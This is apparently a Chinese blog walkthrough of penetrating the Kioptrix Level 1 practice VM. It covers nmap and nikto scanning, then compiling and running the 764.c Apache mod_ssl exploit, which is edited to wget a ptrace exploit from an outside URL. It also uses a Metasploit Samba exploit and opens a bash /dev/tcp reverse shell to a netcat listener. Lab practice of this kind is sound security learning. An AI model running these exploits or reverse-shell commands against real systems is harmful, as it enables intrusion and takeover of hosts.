美文网首页
Kioptrix Level 1靶机渗透

Kioptrix Level 1靶机渗透

作者: Conn606 | 来源:发表于2021-03-14 10:46 被阅读0次

    一、kali nmap 发现主机

    1.用namp扫描c段 没发现主机

    解决办法 :

    (1):打开靶机所在文件夹,找到vmx后缀的文件并打开

    (2):将Bridged全部改成nat(默认是桥接模式,因为kali是nat才能扫描IP)

    2.识别到主机IP为192.168.65.134
    3.端口扫描,发现开放了80、22、111、139、443、1024端口
    4.nikto目录扫描

    二、漏洞利用之apache

    1.搜索apache 1.3.20版本漏洞
    2.编译执行漏洞
    • 发现编译764.c失败,解决办法如下:
    1. 安装libssl,命令sudo apt-get install libssl1.0-dev
    1. 在头文件添加#include <openssl/rc4.h> #include <openssl/md5.h>
    1. 将#define COMMAND2,wget后面的URL修改为https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
    1. 将unsigned char *p, *end前添加const

    5.在kali编译成功gcc -o okk 764.c -lcrypto

    1. 执行漏洞成功./okk 0x6b 192.168.65.134 -c 40

    三、漏洞利用之Samba

    Samba是在LinuxUNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成

    1.信息收集发现主机139端口安装了samba,版本为Samba 2.2.1a
    2.直接msf搜索samba
    3.漏洞利用提权
    4.nc反弹shell

    1.kali nc监听端口nc -lvvp 1234

    2.反弹shellbash -i >& /dev/tcp/192.168.65.129/1234 0>&1(192.168.65.129是kali主机的ip,不是靶机的ip)


    3.反弹成功

    相关文章

      网友评论

          本文标题:Kioptrix Level 1靶机渗透

          本文链接:https://www.haomeiwen.com/subject/fclqcltx.html